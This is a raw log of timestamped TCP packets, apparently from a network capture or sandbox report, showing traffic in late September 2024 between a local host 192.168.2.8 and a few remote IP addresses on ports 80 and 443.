Sep 27, 2024 01:49:56.161727905 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161727905 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161732912 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161742926 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161748886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161789894 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161807060 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161820889 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161822081 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161835909 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161850929 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161866903 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161880970 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161909103 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161909103 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.161911011 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161926985 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161943913 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161958933 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161974907 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.161992073 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162008047 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162023067 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162039042 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162045956 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162045956 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162045956 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162045956 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162054062 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162070036 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162084103 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162122011 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162137032 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162144899 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162144899 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162144899 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162154913 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162169933 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162185907 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162203074 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162219048 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162230015 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162237883 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162285089 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162286997 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162302017 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162336111 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162352085 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162369967 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162369967 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162369967 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162385941 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162401915 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162417889 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162434101 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162450075 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162465096 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162470102 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162470102 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162480116 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162498951 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162564039 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162580967 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162586927 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162595987 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162607908 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162612915 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162628889 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162646055 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162658930 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162661076 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162677050 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162679911 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162691116 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162705898 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162720919 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162736893 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162751913 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162766933 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162766933 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162802935 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162818909 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162833929 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162848949 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162864923 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162873030 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162873030 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.162880898 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162897110 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162913084 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162929058 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162942886 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162960052 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162976027 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.162992001 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163007975 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163023949 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163038015 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163049936 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163049936 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163049936 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163049936 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163049936 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163049936 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163053989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163069963 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163089991 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163106918 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163121939 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163122892 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163141012 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163151026 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163156986 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163172960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163206100 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163316965 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163331985 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163347960 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163358927 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163362980 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163404942 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163433075 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163449049 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163465977 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163480043 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163496017 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163512945 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163548946 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163573027 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163588047 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163598061 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163598061 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163598061 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163604021 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163619995 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163634062 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163635969 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163649082 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163667917 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163703918 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163729906 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163736105 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163736105 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163746119 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163759947 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163763046 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163779974 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163795948 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163811922 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163826942 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163851023 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163851976 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163851976 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163868904 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163877010 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163885117 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163898945 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163916111 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163933992 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163934946 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163948059 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163963079 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163975000 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.163979053 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163992882 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.163994074 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164007902 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164025068 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164040089 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164040089 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164072037 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164086103 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164112091 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164134979 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164150953 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164153099 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164153099 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164170027 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164185047 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164199114 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164215088 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164220095 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164231062 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164232969 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164247036 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164263964 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164274931 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164274931 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164278984 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164294958 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164298058 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164313078 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164328098 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164333105 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164344072 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164354086 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164360046 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164375067 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164390087 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164391994 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164405107 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164422035 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164438009 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164453983 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164455891 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164485931 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164505959 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164520979 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164536953 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164547920 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164551973 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164567947 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164582968 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164585114 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.164671898 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.164716005 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165024042 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165040016 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165055990 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165069103 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165071964 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165083885 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165086985 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165096998 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165107012 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165124893 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165153980 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165194035 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165209055 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165225029 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165242910 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165258884 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165271044 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165282011 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165297985 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165313005 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165328979 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165344000 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165344954 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165344954 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165344954 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165344000 CEST	443	49744	104.21.58.182	192.168.2.8
Sep 27, 2024 01:49:56.165369034 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165385962 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165405035 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165421009 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165436029 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165452003 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165461063 CEST	443	49744	104.21.58.182	192.168.2.8
Sep 27, 2024 01:49:56.165477037 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165488005 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165488005 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165488005 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165501118 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165523052 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165538073 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165554047 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165555954 CEST	49744	443	192.168.2.8	104.21.58.182
Sep 27, 2024 01:49:56.165555954 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165568113 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165584087 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165585995 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165592909 CEST	443	49745	5.75.211.162	192.168.2.8
Sep 27, 2024 01:49:56.165601969 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165616989 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165632963 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165648937 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165662050 CEST	49745	443	192.168.2.8	5.75.211.162
Sep 27, 2024 01:49:56.165663004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165663004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165666103 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165683031 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165698051 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165698051 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165698051 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165714979 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165730953 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165745974 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165760994 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165776014 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165792942 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165808916 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165823936 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165851116 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165865898 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.165874004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165874004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165874004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.165874004 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.168689013 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.168689013 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.170942068 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.170969963 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.170986891 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171004057 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171235085 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171248913 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171287060 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171303034 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171314001 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171314001 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171318054 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171334028 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171349049 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171350956 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171370983 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171443939 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171462059 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171477079 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171490908 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171509027 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171524048 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171533108 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171533108 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171533108 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171547890 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171591043 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171606064 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171606064 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171607018 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171622992 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171633959 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171646118 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171658039 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171663046 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171678066 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171693087 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171706915 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171708107 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171731949 CEST	49743	80	192.168.2.8	147.45.44.104
Sep 27, 2024 01:49:56.171753883 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171772003 CEST	80	49743	147.45.44.104	192.168.2.8
Sep 27, 2024 01:49:56.171788931 CEST	49743	80	192.168.2.8	147.45.44.104
